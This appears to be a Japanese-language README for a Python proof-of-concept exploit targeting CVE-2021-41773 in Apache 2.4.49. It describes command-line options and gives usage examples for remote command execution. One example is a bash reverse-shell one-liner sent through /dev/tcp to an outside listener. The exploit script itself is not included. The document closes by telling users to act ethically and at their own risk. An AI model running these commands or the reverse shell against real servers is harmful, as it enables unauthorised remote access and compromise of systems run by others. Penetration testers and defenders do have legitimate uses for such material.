
CVE-2021-41773用のPythonベースの概念実証エクスプロイト。カスタムコマンドとポートオプションを使用して、Apache 2.4.49サーバーでのリモートコード実行を可能にします。
CVE-2021-41773 の PoC です。複雑すぎるエクスプロイトしか見つからなかったため、こちらはリモートコード実行に直接アクセスします。
脆弱な Apache 2.4.49 サーバーが動作している IP アドレスを -i で指定し、実行したいシステムコマンドを -c で指定するだけです。Web サーバーがポート 80 で動作していない場合は -p で指定でき、Web サーバーが HTTPs を使用している場合は --use-https フラグを使用する必要があります。
$ python3 CVE-2021-41773.py -i 10.10.10.10 -c 'id'
$ python3 CVE-2021-41773.py -i example.com -p 8080 -c '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'
$ python3 CVE-2021-41773.py -i 20.20.20.20 -p 443 --use-https -c 'whoami'
自己責任で使用してください (:
倫理的に行動しましょう。